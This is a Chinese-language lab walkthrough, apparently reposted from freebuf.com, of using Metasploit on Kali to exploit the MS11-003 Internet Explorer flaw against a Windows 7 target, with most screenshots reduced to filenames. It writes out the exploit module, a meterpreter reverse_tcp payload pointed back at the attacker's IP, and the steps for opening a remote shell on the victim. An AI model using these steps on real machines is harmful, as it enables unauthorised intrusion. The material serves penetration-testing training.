kail利用msf工具对ms11-003漏洞入侵渗透Win7 – 作者:Zxl2605

前言:

windows7IE溢出攻击

实验环境:

工具:metasploit

靶机两台:windows 7和kali2020

攻击机IP地址:10.20.29.129

被攻击机IP地址:10.20.29.134

步骤:

1、在kali里面打开metasploit漏洞利用框架

1622018179_60ae08839f80d6c647b16.png!small?1622018181421

2、搜索ms11-003漏洞利用模块 

1622018230_60ae08b6ed4dcba6785e2.png!small?1622018232451

3、使用利用模块use exploit/windows/browser/ms11_003_ie_css_import

1622018262_60ae08d6b5a8b2834db73.png!small?1622018264092

4、设置payload    set payload windows/meterpreter/reverse_tcp

1622018382_60ae094ec86775ddb0517.png!small?1622018384102

5、查看options

1622018457_60ae0999618a10a81817d.png!small?1622018458924

6、配置options信息(SRVHOST、LHOST均为Kali IP、URIPATH+任意数)

set srvhost 10.20.29.129
set lhost 10.20.29.129
set uripath 81622018627_60ae0a434baeea60ac3be.png!small

7、开始攻击 run/exploite,会生成一个URL,复制链接使用Windows7 IE浏览器访问

1622018684_60ae0a7ccbf849d18a811.png!small?1622018686185

8、打开windows 7 并进行访问

1622018758_60ae0ac6be71d1a252889.png!small?1622018760073

9、这时kali虚拟机出现这种情况说明连接成功

1622018789_60ae0ae5d3f14f36733f8.png!small?1622018791917

10、查看session会话

1622018888_60ae0b484cb6ba8f4ac1b.png!small?1622018889686

11、sessions -i 1 连接windows7

选择sessions会话的时候可能会连接不成功,那么换一个sessions即可

1622018984_60ae0ba8be3e68dda7ce5.png!small?1622018985999

12、获取shell,并输入ipconfig

1622019050_60ae0bea1aa3cfe9c126d.png!small?1622019052024

来源:freebuf.com 2021-05-26 16:51:41 by: Zxl2605

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享
评论 抢沙发

请登录后发表评论